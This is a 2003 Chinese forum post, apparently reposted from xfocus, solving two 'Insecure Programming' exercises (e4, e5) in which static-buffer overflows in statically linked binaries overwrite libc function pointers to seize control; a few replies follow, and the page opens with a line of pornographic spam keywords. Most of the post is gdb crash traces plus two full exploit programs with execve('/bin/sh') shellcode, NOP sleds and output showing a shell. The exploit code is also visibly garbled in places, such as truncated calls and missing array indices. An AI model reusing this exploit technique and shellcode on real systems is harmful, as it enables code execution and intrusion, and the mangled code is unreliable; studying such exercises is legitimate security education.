亚洲av成人无遮挡网站在线观看,少妇性bbb搡bbb爽爽爽,亚洲av日韩精品久久久久久,兔费看少妇性l交大片免费,无码少妇一区二区三区

  免費注冊 查看新帖 |

Chinaunix

  平臺 論壇 博客 文庫
最近訪問板塊 發(fā)新帖
查看: 1731 | 回復: 4
打印 上一主題 下一主題

非安全編程演示之高級篇2 [復制鏈接]

論壇徽章:
0
跳轉到指定樓層
1 [收藏(0)] [報告]
發(fā)表于 2003-05-26 10:47 |只看該作者 |倒序瀏覽
注:本文轉自安全焦點(www.xfocus.org)

★ 3.4 演示四

/* e4.c                                                      *
* specially crafted to feed your brain by gera@core-sdi.com */

/* %what the hell?                                           */

char buf[256];

int main(int argv,char **argc) {
    strcpy(buf,argc[1]);
    printf("live at 100%!";
    while(1);
}

[alert7@redhat]$ gcc -o e4 e4.c -static //靜態(tài)編譯的時候才會出現(xiàn)這樣的情況
[alert7@redhat]$ ./e4 `perl -e 'print "a"x1408'`
[alert7@redhat]$ ./e4 `perl -e 'print "a"x1409'`
Segmentation fault (core dumped)
[alert7@redhat]$ gdb -q e4 core
Core was generated by `./e4 aaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaa'.
Program terminated with signal 11, Segmentation fault.
#0  0x61616161 in ?? ()
(gdb) bt
#0  0x61616161 in ?? ()
#1  0x8048681 in printf (format=0x8071548 "live at 100%!" at printf.c:31
#2  0x80481c3 in main ()
#3  0x804831b in __libc_start_main (main=0x80481a0 <main>;, argc=2,
    argv=0xbffff6a4, init=0x80480b4 <_init>;, fini=0x807150c <_fini>;,
    rtld_fini=0, stack_end=0xbffff69c) at ../sysdeps/generic/libc-start.c:92
[alert7@redhat62 alert7]$ ./e4 `perl -e 'print "a"x518'``perl -e 'print "b"x891'`
Segmentation fault (core dumped)
[alert7@redhat62 alert7]$ gdb e4 core -q                                         
Core was generated by `./e4 aaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaa'.
Program terminated with signal 11, Segmentation fault.
#0  0x62626161 in ?? ()
[alert7@redhat62 alert7]$ ./e4 `perl -e 'print "a"x516'``perl -e 'print "b"x893'`
Segmentation fault (core dumped)
[alert7@redhat62 alert7]$ gdb e4 core -q                                         
Core was generated by `./e4 aaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaa'.
Program terminated with signal 11, Segmentation fault.
#0  0x62626262 in ?? ()

根據(jù)上面的條件,我們可以完全不必理會printf()內部到底發(fā)生了什么。只需要知道
在buf+516的地方放入一個值,該值就會變成EIP。

/* exp_e4.c
* alert7 exploit for static e4  
*/
#include <stdio.h>;

#define RET_POSITION                     516
#define NOP                            0x90
#define BUFADDR                0x807bbc0//0xaabbccdd
char shellcode[]=
        "\xeb\x1f"                      /* jmp 0x1f              */
        "\x5e"                          /* popl %esi             */
        "\x89\x76\x08"                  /* movl %esi,0x8(%esi)   */
        "\x31\xc0"                      /* xorl %eax,%eax        */
        "\x88\x46\x07"                  /* movb %eax,0x7(%esi)   */
        "\x89\x46\x0c"                  /* movl %eax,0xc(%esi)   */
        "\xb0\x0b"                      /* movb $0xb,%al         */
        "\x89\xf3"                      /* movl %esi,%ebx        */
        "\x8d\x4e\x08"                  /* leal 0x8(%esi),%ecx   */
        "\x8d\x56\x0c"                  /* leal 0xc(%esi),%edx   */
        "\xcd\x80"                      /* int $0x80             */
        "\x31\xdb"                      /* xorl %ebx,%ebx        */
        "\x89\xd8"                      /* movl %ebx,%eax        */
        "\x40"                          /* inc %eax              */
        "\xcd\x80"                      /* int $0x80             */
        "\xe8\xdc\xff\xff\xff"          /* call -0x24            */
        "/bin/sh";                      /* .string \"/bin/sh\"   */

int main(int argc,char **argv)
{
        char buff[2048],*ptr;
        int retaddr;
    int i;

    retaddr=BUFADDR;
    if(argc>;1)
                retaddr=BUFADDR+atoi(argv[1]);

    bzero(buff,204;
    for(i=0;i<2000;i++)
buff=NOP;
*((long *)&(buff[RET_POSITION]))=retaddr;

ptr=buff+50;
for(i=0;i<strlen(shellcode);i++)
*(ptr++)=shellcode;
printf("Jump to 0x%08x\n",retaddr);

execl("./e4","e4",buff,0);
}

[alert7@redhat62 alert7]$ ./exp_e4
Jump to 0x0807bbc0
bash$ id
uid=502(alert7) gid=502(alert7) groups=502(alert7)
成功
通用性沒有,需猜測BUFADDR地址。

程序問題所在:

0x8050101 <_IO_vfprintf+9361>;:  mov    0x807bd40(,%edx,4),%edx
0x8050108 <_IO_vfprintf+9368>;:  test   %edx,%edx //此時edx=0x62626262
0x805010a <_IO_vfprintf+9370>;:  je     0x8050130 <_IO_vfprintf+9408>;
0x805010c <_IO_vfprintf+9372>;:  add    $0x28,%eax
0x805010f <_IO_vfprintf+9375>;:  push   %eax
0x8050110 <_IO_vfprintf+9376>;:  push   $0x1
0x8050112 <_IO_vfprintf+9378>;:  mov    0xfffffab4(%ebp),%ecx
0x8050118 <_IO_vfprintf+9384>;:  push   %ecx
0x8050119 <_IO_vfprintf+9385>;:  call   *%edx //這里出了問題
(gdb) x 0x807bd40
0x807bd40 <__printf_arginfo_table>;:     0x61616161

只要是printf("%X";,該X為printf認識不到的或者說是自定義的格式,就會利用
__printf_arginfo_table調用相應的函數(shù)來解釋該格式,而__printf_arginfo_table
數(shù)組被我們數(shù)據(jù)覆蓋,所以我們可以得到控制權。
這是我的粗略的理解,具體的還需要詳細的分析printf函數(shù)的執(zhí)行過程。
錯誤之處還請斧正。

★ 3.5 演示五

/* e5.c                                                      *
* specially crafted to feed your brain by gera@core-sdi.com */

/* is this possible?                                         */

char buf[256];

int main(int argv,char **argc) {
    strcpy(buf,argc[1]);
    perror(argc[2]);
    while(1);
}

靜態(tài)編譯時
(gdb) p &buf
$1 = (<data variable, no debug info>; *) 0x807bc00

[alert7@redhat]$ gcc -o e5 e5.c -static
[alert7@redhat]$ ./e5 `perl -e 'print "a"x255'` a
a: Success

[alert7@redhat]$ ./e5 `perl -e 'print "a"x256'` a
Segmentation fault (core dumped)
[alert7@redhat]$ gdb e5 core -q
Core was generated by `./e5 aaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaa'.
Program terminated with signal 11, Segmentation fault.
#0  chunk_alloc (ar_ptr=0x807a000, nb=4 at malloc.c:2762
2762    malloc.c: No such file or directory.
(gdb) bt
#0  chunk_alloc (ar_ptr=0x807a000, nb=4 at malloc.c:2762
#1  0x8049cf4 in __libc_malloc (bytes=44) at malloc.c:2696
#2  0x804e74a in _nl_make_l10nflist (l10nfile_list=0x807b434, dirlist=0x8071795 "/usr/share/locale", dirlist_len=18, mask=0,
    language=0xbffff628 "en_US", territory=0x0, codeset=0x0, normalized_codeset=0x0, modifier=0x0, special=0x0, sponsor=0x0,
    revision=0x0, filename=0xbffff630 "LC_MESSAGES/libc.mo", do_allocate=0) at l10nflist.c:201
#3  0x804dd30 in _nl_find_domain (dirname=0x8071795 "/usr/share/locale", locale=0xbffff628 "en_US",
    domainname=0xbffff630 "LC_MESSAGES/libc.mo" at finddomain.c:113
#4  0x804d8b0 in __dcgettext (domainname=0x8071786 "libc", msgid=0x80727d4 "Success", category=5) at dcgettext.c:395
#5  0x804d06d in __strerror_r (errnum=0, buf=0xbffff6cc "", buflen=1024) at ../sysdeps/generic/_strerror.c:68
#6  0x80486ae in perror (s=0xbffffcc8 "a" at perror.c:38
#7  0x80481c7 in main ()
#8  0x804831b in __libc_start_main (main=0x80481a0 <main>;, argc=3, argv=0xbffffb24, init=0x80480b4 <_init>;,
    fini=0x807155c <_fini>;, rtld_fini=0, stack_end=0xbffffb1c) at ../sysdeps/generic/libc-start.c:92
(gdb)
[alert7@redhat]$ ./e5 `perl -e 'print "a"x257'` a
Segmentation fault (core dumped)
[alert7@redhat]$ gdb e5 core -q
Core was generated by `./e5 aaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaa'.
Program terminated with signal 11, Segmentation fault.
#0  chunk_alloc (ar_ptr=0x8070061, nb=4 at malloc.c:2762
2762    malloc.c: No such file or directory.
(gdb) quit
[alert7@redhat]$ ./e5 `perl -e 'print "a"x258'` a
Segmentation fault (core dumped)
[alert7@redhat]$ gdb e5 core -q
Core was generated by `./e5 aaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaa'.
Program terminated with signal 11, Segmentation fault.
#0  chunk_alloc (ar_ptr=0x8006161, nb=4 at malloc.c:2752
2752    malloc.c: No such file or directory.
(gdb) quit
[alert7@redhat]$ ./e5 `perl -e 'print "a"x259'` a
Segmentation fault (core dumped)
[alert7@redhat]$ gdb e5 core -q
Core was generated by `./e5 aaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaa'.
Program terminated with signal 11, Segmentation fault.
#0  chunk_alloc (ar_ptr=0x616161, nb=4 at malloc.c:2752
2752    malloc.c: No such file or directory.
(gdb) quit
[alert7@redhat]$ ./e5 `perl -e 'print "a"x260'` a
Segmentation fault (core dumped)
[alert7@redhat]$ gdb e5 core -q
Core was generated by `./e5 aaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaa'.
Program terminated with signal 11, Segmentation fault.
#0  chunk_alloc (ar_ptr=0x61616161, nb=4 at malloc.c:2752
2752    malloc.c: No such file or directory.

./e5 `perl -e 'print "a"x260'` a  ---./e5 `perl -e 'print "a"x264'` a都是上面這種情況

[alert7@redhat]$ ./e5 `perl -e 'print "a"x265'` a
Segmentation fault (core dumped)
[alert7@redhat]$ gdb e5 core -q
Core was generated by `./e5 aaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaa'.
Program terminated with signal 11, Segmentation fault.
#0  0x61 in ?? ()
(gdb) quit
[alert7@redhat]$ ./e5 `perl -e 'print "a"x266'` a
Segmentation fault (core dumped)
[alert7@redhat]$ gdb e5 core -q
Core was generated by `./e5 aaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaa'.
Program terminated with signal 11, Segmentation fault.
#0  0x6161 in ?? ()
(gdb) quit
[alert7@redhat]$ ./e5 `perl -e 'print "a"x267'` a
Segmentation fault (core dumped)
[alert7@redhat]$ gdb e5 core -q
Core was generated by `./e5 aaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaa'.
Program terminated with signal 11, Segmentation fault.
#0  0x616161 in ?? ()
(gdb) quit
[alert7@redhat]$ ./e5 `perl -e 'print "a"x268'` a
Segmentation fault (core dumped)
[alert7@redhat]$ gdb e5 core -q
Core was generated by `./e5 aaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaa'.
Program terminated with signal 11, Segmentation fault.
#0  0x61616161 in ?? ()
(gdb) bt
#0  0x61616161 in ?? ()
#1  0x804e74a in _nl_make_l10nflist (l10nfile_list=0x807b434, dirlist=0x8071795 "/usr/share/locale", dirlist_len=18, mask=0,
    language=0xbffff628 "en_US", territory=0x0, codeset=0x0, normalized_codeset=0x0, modifier=0x0, special=0x0, sponsor=0x0,
    revision=0x0, filename=0xbffff630 "LC_MESSAGES/libc.mo", do_allocate=0) at l10nflist.c:201
#2  0x804dd30 in _nl_find_domain (dirname=0x8071795 "/usr/share/locale", locale=0xbffff628 "en_US",
    domainname=0xbffff630 "LC_MESSAGES/libc.mo" at finddomain.c:113
#3  0x804d8b0 in __dcgettext (domainname=0x8071786 "libc", msgid=0x80727d4 "Success", category=5) at dcgettext.c:395
#4  0x804d06d in __strerror_r (errnum=0, buf=0xbffff6cc "", buflen=1024) at ../sysdeps/generic/_strerror.c:68
#5  0x80486ae in perror (s=0xbffffcc8 "a" at perror.c:38
#6  0x80481c7 in main ()
#7  0x804831b in __libc_start_main (main=0x80481a0 <main>;, argc=3, argv=0xbffffb24, init=0x80480b4 <_init>;,
    fini=0x807155c <_fini>;, rtld_fini=0, stack_end=0xbffffb1c) at ../sysdeps/generic/libc-start.c:92

./e5 `perl -e 'print "a"x268'` a---./e5 `perl -e 'print "a"x364'` a都是如上

[alert7@redhat]$ ./e5 `perl -e 'print "a"x365'` a
Segmentation fault (core dumped)
[alert7@redhat]$ gdb e5 core -q
Core was generated by `./e5 aaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaa'.
Program terminated with signal 11, Segmentation fault.
#0  0x804d683 in __dcgettext (domainname=0x8071786 "libc", msgid=0x80727d4 "Success", category=5) at dcgettext.c:282
282     dcgettext.c: No such file or directory.
(gdb) x/i 0x804d683
0x804d683 <__dcgettext+67>;:     pushl  0x4(%eax)
(gdb) i reg eax
eax            0x61     97
(gdb) quit
[alert7@redhat]$ ./e5 `perl -e 'print "a"x368'` a //這以后都是老樣子
Segmentation fault (core dumped)
[alert7@redhat]$ gdb e5 core -q
Core was generated by `./e5 aaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaa'.
Program terminated with signal 11, Segmentation fault.
#0  0x804d683 in __dcgettext (domainname=0x8071786 "libc", msgid=0x80727d4 "Success", category=5) at dcgettext.c:282
282     dcgettext.c: No such file or directory.
(gdb) x/i 0x804d683
0x804d683 <__dcgettext+67>;:     pushl  0x4(%eax)
(gdb) i reg eax
eax            0x61616161       1633771873
(gdb) bt
#0  0x804d683 in __dcgettext (domainname=0x8071786 "libc", msgid=0x80727d4 "Success", category=5) at dcgettext.c:282
#1  0x804d06d in __strerror_r (errnum=0, buf=0xbffff65c "", buflen=1024) at ../sysdeps/generic/_strerror.c:68
#2  0x80486ae in perror (s=0xbffffcc8 "a" at perror.c:38
#3  0x80481c7 in main ()
#4  0x804831b in __libc_start_main (main=0x80481a0 <main>;, argc=3, argv=0xbffffab4, init=0x80480b4 <_init>;,
    fini=0x807155c <_fini>;, rtld_fini=0, stack_end=0xbffffaac) at ../sysdeps/generic/libc-start.c:92

argv[1]長度限制在268----364
buff+264的地方就是eip

/* exp_e5.c
* alert7 exploit for static e5
*/
#include <stdio.h>;
#define RET_POSITION                    264
#define NOP                            0x90
#define BUFADDR                0x807bc00//0xaabbccdd
char shellcode[]=
        "\xeb\x1f"                      /* jmp 0x1f              */
        "\x5e"                          /* popl %esi             */
        "\x89\x76\x08"                  /* movl %esi,0x8(%esi)   */
        "\x31\xc0"                      /* xorl %eax,%eax        */
        "\x88\x46\x07"                  /* movb %eax,0x7(%esi)   */
        "\x89\x46\x0c"                  /* movl %eax,0xc(%esi)   */
        "\xb0\x0b"                      /* movb $0xb,%al         */
        "\x89\xf3"                      /* movl %esi,%ebx        */
        "\x8d\x4e\x08"                  /* leal 0x8(%esi),%ecx   */
        "\x8d\x56\x0c"                  /* leal 0xc(%esi),%edx   */
        "\xcd\x80"                      /* int $0x80             */
        "\x31\xdb"                      /* xorl %ebx,%ebx        */
        "\x89\xd8"                      /* movl %ebx,%eax        */
        "\x40"                          /* inc %eax              */
        "\xcd\x80"                      /* int $0x80             */
        "\xe8\xdc\xff\xff\xff"          /* call -0x24            */
        "/bin/sh";                      /* .string \"/bin/sh\"   */

int main(int argc,char **argv)
{
        char buff[300],*ptr;
        int retaddr;
    int i;

    retaddr=BUFADDR;
    if(argc>;1)
                retaddr=BUFADDR+atoi(argv[1]);

    bzero(buff,300);
    for(i=0;i<299;i++)
buff=NOP;
*((long *)&(buff[RET_POSITION]))=retaddr;

ptr=buff+50;
for(i=0;i<strlen(shellcode);i++)
*(ptr++)=shellcode;
printf("Jump to 0x%08x\n",retaddr);

execl("./e5","e5",buff,"a",0);
}
[alert7@redhat62 alert7]$ ./exp_e5
Jump to 0x0807bc00 //地址中有\(zhòng)0 ,
Segmentation fault (core dumped)
[alert7@redhat62 alert7]$ ./exp_e5 1
Jump to 0x0807bc01
bash$ id
uid=502(alert7) gid=502(alert7) groups=502(alert7)
成功


同樣跟蹤了下程序

(gdb) disass __libc_malloc
Dump of assembler code for function __libc_malloc:
...
0x8049c95 <__libc_malloc+89>;:   mov    0x807bd08,%eax
0x8049c9a <__libc_malloc+94>;:   test   %eax,%eax
0x8049c9c <__libc_malloc+96>;:   je     0x8049cb0 <__libc_malloc+116>;
0x8049c9e <__libc_malloc+98>;:   push   $0x0
0x8049ca0 <__libc_malloc+100>;:  call   *%eax  
...
(gdb) i reg eax
eax            0x61616161       1633771873
(gdb) x 0x807bd08
0x807bd08 <__libc_internal_tsd_get>;:    0x61616161
(gdb) p & __libc_internal_tsd_get
$2 = (void *(**)()) 0x807bd08
(gdb) p  __libc_internal_tsd_get
$3 = (void *(*)()) 0x61616161

出現(xiàn)的問題同3.3


★ 小結:

   gera就象是老師,出了這份試卷,而我則是學生做了這份試卷,所以
錯誤之處還請各位老師指正;蛘咛接懯裁吹亩伎梢。有則改之,無則嘉勉。

再次感謝gera@core-sdi.com為我們出的這份試卷
http://community.core-sdi.com/~gera/InsecureProgramming/InsecureProgramming.tar.gz

論壇徽章:
0
2 [報告]
發(fā)表于 2003-05-26 18:30 |只看該作者

非安全編程演示之高級篇2

木馬?
原來是想利用緩沖區(qū)溢出

論壇徽章:
0
3 [報告]
發(fā)表于 2003-05-26 19:24 |只看該作者

非安全編程演示之高級篇2

哈哈,無雙有時真的好可愛哦

論壇徽章:
0
4 [報告]
發(fā)表于 2003-05-26 21:39 |只看該作者

非安全編程演示之高級篇2

是不是啊RDD
我覺得應該像是木馬程序

論壇徽章:
0
5 [報告]
發(fā)表于 2003-05-27 12:08 |只看該作者

非安全編程演示之高級篇2

應該不是木馬,程序員是編寫代碼時要注意的緩沖區(qū)溢出漏洞。

<編寫安全代碼>;一書有例子。
您需要登錄后才可以回帖 登錄 | 注冊

本版積分規(guī)則 發(fā)表回復

  

北京盛拓優(yōu)訊信息技術有限公司. 版權所有 京ICP備16024965號-6 北京市公安局海淀分局網監(jiān)中心備案編號:11010802020122 niuxiaotong@pcpop.com 17352615567
未成年舉報專區(qū)
中國互聯(lián)網協(xié)會會員  聯(lián)系我們:huangweiwei@itpub.net
感謝所有關心和支持過ChinaUnix的朋友們 轉載本站內容請注明原作者名及出處

清除 Cookies - ChinaUnix - Archiver - WAP - TOP